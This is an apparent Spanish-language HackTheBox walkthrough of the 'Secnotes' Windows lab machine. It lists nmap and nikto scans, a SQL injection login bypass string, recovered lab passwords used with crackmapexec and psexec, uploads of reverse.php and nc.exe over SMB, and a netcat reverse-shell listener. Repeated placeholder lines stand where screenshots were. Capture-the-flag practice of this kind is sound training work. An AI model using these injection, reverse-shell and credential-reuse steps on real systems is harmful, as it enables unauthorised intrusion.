Secnotes

May 16, 2024
HTB Windows

ssh_command. )

nmap -A -p- -oA secnotes 10.129.178.250 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA secnotes 10.129.178.250

nmap -sU -O -p- -oA secnotes-udp 10.129.178.250

nikto -h 10.129.178.250:80

ssh_command.

’ or 1= ‘1

ssh_command.

Le damos click a new site y vemos las credenciales de

tyler:92g!mA8BGjOirkL%OG*&

![[ ssh_command. ]]

Trate de usar psexec para poder logearme pero no fue exitoso.

ssh_command.

crackmapexec smb 10.129.178.250 -u ‘tyler’ -p ‘92g!mA8BGjOirkL%OG*&’ —users

ssh_command.

crackmapexec smb 10.129.178.250 -u ‘tyler’ -p ‘92g!mA8BGjOirkL%OG*&’ —users

crackmapexec smb 10.129.178.250 -u ‘tyler’ -p ‘92g!mA8BGjOirkL%OG*&’ —groups

crackmapexec smb 10.129.178.250 -u ‘tyler’ -p ‘92g!mA8BGjOirkL%OG*&’ —shares

ssh_command.

cat reverse.php

ssh_command.

smbclient //secnotes.htb/new-site -U tyler

put reverse.php

put nc.exe

ssh_command.

nc -lvnp 443

ssh_command.

Nos dirigimos a el desktop de tyler Y vemos un bash.lnk

ssh_command.

type bash.lnk

ssh_command.

#find files in windows looking for bash

where /R c:\windows bash.exe

ssh_command.

Corremos el archivo de bash Y vemos que somos root

ssh_command.

cat .bash_history

ssh_command.

python3 /opt/impacket/examples/psexec.py secnotes.htb/administrator:‘u6!4Zwgw0M#^0Bf#Nwnh’@10.129.178.250 ssh_command.